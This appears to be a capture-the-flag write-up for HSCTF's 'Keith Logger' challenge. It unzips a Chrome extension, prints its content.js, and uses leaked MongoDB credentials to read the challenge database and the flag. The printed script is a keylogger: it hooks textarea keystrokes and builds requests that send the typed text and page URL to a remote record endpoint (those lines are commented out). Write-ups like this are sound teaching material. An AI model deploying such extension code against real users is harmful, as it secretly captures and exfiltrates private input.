# Keith Logger ``` Keith is up to some evil stuff! Can you figure out what he's doing and find the flag? Note: nothing is actually saved ``` (File(s): attachments/extension.crx) We're given a Chrome extension. Something to note about `.crx` files is that, similar to `.apk` files, they're really just zips. As such, we can just unzip them. ``` $ unzip extension.crx Archive: extension.crx warning [extension.crx]: 593 extra bytes at beginning or within zipfile (attempting to process anyway) inflating: jquery-3.3.1.min.js inflating: manifest.json inflating: content.js ``` Let's have a look at the `content.js`. ```javascript var timeout_textarea; var xhr_textarea; $("textarea").on("keyup", function() { if (timeout_textarea) { clearTimeout(timeout_textarea); } if (xhr_textarea) { xhr_textarea.abort(); } timeout_textarea = setTimeout(function() { var xhr = new XMLHttpRequest(); /* xhr.open( "GET", "https://keith-logger.web.chal.hsctf.com/api/record?text=" + encodeURIComponent($("textarea").val()) + "&url=" + encodeURIComponent(window.location.href), true );*/ // send a request to admin whenever something is logged, not needed anymore after testing /* xhr.open( "GET", "https://keith-logger.web.chal.hsctf.com/api/admin", true );*/ xhr.send(); }, 2000); }); ``` Looks like we found the API page: https://keith- logger.web.chal.hsctf.com/api/admin Let's give it a visit. ![](https://raw.githubusercontent.com/shawnduong/ctf- writeups/master/2019-HSCTF6/images/keith-logger-1.png) Looks like we found the MongoDB server. Let's go ahead and connect to it to get the flag. ``` $ mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase "admin" MongoDB shell version v4.0.10 connecting to: mongodb://keith-logger- mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb Implicit session: session { "id" : UUID("05235c05-5480-45f1-a5af-b540d8335c38") } MongoDB server version: 4.0.10 > use database switched to db database > show collections collection > db.collection.find() { "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" } { "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" } { "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" } { "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" } { "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" } { "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith- logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" } ``` Found the flag. ``` hsctf{watch_out_for_keyloggers} ``` Original writeup (https://github.com/shawnduong/ctf- writeups/blob/master/2019-HSCTF6/Web/keith-logger.md).